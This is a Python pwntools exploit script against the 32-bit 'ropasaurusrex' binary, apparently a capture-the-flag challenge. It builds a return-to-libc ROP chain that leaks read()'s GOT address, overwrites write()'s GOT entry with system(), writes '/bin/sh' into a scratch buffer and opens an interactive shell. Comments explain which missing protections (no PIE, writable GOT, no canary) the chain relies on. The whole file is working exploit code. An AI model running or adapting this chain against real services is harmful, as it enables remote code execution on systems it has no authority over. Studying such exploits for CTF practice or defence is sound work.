
```python
from pwn import *
import sys

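# Two-stage return-to-libc chain against the 32-bit `ropasaurusrex` binary.
#
# What the script depends on, as visible from the values below:
#   * fixed code/GOT addresses in the 0x0804xxxx range (the binary is not
#     position independent, so these do not move between runs);
#   * a writable GOT entry for write() (stage 2 overwrites it, which full
#     RELRO would prevent);
#   * 140 bytes of padding reaching the saved return address with nothing
#     checked in between (no stack canary is accounted for).
# libc's load address is not assumed: it is recovered at run time from a
# leaked GOT entry, so ASLR on libc alone does not stop this chain.

# Target selection: 'r' = network service, 'l' = local process.
mode = sys.argv[1] if len(sys.argv) > 1 else ""
if mode == 'r':
    HOST = "localhost"
    PORT = 5000
    # LIBC = "./libc.so.6"
    LIBC = "/lib/i386-linux-gnu/libc.so.6"
    r = remote(HOST, PORT)
elif mode == 'l':
    LIBC = "/lib/i386-linux-gnu/libc.so.6"
    r = process('ropasaurusrex')
else:
    # Without this branch a missing argument raised IndexError and an unknown
    # one left `r` and `LIBC` undefined (NameError further down).
    sys.exit("usage: {} r|l".format(sys.argv[0]))

# GOT slots of write() and read() in the target binary.
addr_write_got = 0x08049614
addr_read_got = 0x0804961c

# PLT stubs of write() and read().
addr_write_plt = 0x804830c
addr_read_plt = 0x804832c

# Gadget that pops three words and returns; it discards the three arguments
# of the previous call so the next chain entry becomes the return address.
pop3ret = 0x80484b6

# Scratch buffer 0x800 bytes past 0x8049628 (named after .bss by the author).
bss_0x800 = 0x8049628 + 0x800

# The read->system distance is only meaningful if LIBC is the same build the
# target process has loaded; a different libc yields a wrong address.
libc = ELF(LIBC)
# NOTE(review): the keys are bytes here; pwntools on Python 3 indexes
# symbols by str - confirm against the pwntools version in use.
offset_read2system = libc.symbols[b"system"] - libc.symbols[b"read"]

# 140 filler bytes up to the saved return address.
payload = b"A" * 140

# Stage 1 - write(1, &read@got, 4): send the resolved address of read()
# back to us (information leak).
payload += p32(addr_write_plt)
payload += p32(pop3ret)
payload += p32(1)
payload += p32(addr_read_got)
payload += p32(4)

# Stage 2 - read(0, &write@got, 4): replace write()'s GOT entry with the
# 4 bytes we send next.
payload += p32(addr_read_plt)
payload += p32(pop3ret)
payload += p32(0)
payload += p32(addr_write_got)
payload += p32(4)

# Stage 3 - read(0, bss_0x800, 8): store the 8-byte command string in the
# scratch buffer.
payload += p32(addr_read_plt)
payload += p32(pop3ret)
payload += p32(0)
payload += p32(bss_0x800)
payload += p32(8)

# Stage 4 - call through write@plt, whose GOT entry now holds system(), so
# this is system(bss_0x800). 0xdeadbeef is a dummy return address.
payload += p32(addr_write_plt)
payload += p32(0xdeadbeef)
payload += p32(bss_0x800)

# Keep a copy of the raw bytes on disk for inspection in a debugger.
with open("payload", "wb") as f:
    f.write(payload)

# Run the chain.
r.send(payload)
# NOTE(review): recv() returns whatever has arrived and u32() needs exactly
# 4 bytes, so this assumes the stage-1 leak arrives alone in one chunk.
addr_read_fun = u32(r.recv())
addr_system_fun = addr_read_fun + offset_read2system
r.send(p32(addr_system_fun))   # consumed by stage 2
r.send(b"/bin/sh\x00")         # consumed by stage 3 (8 bytes incl. NUL)
r.interactive()
r.close()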
```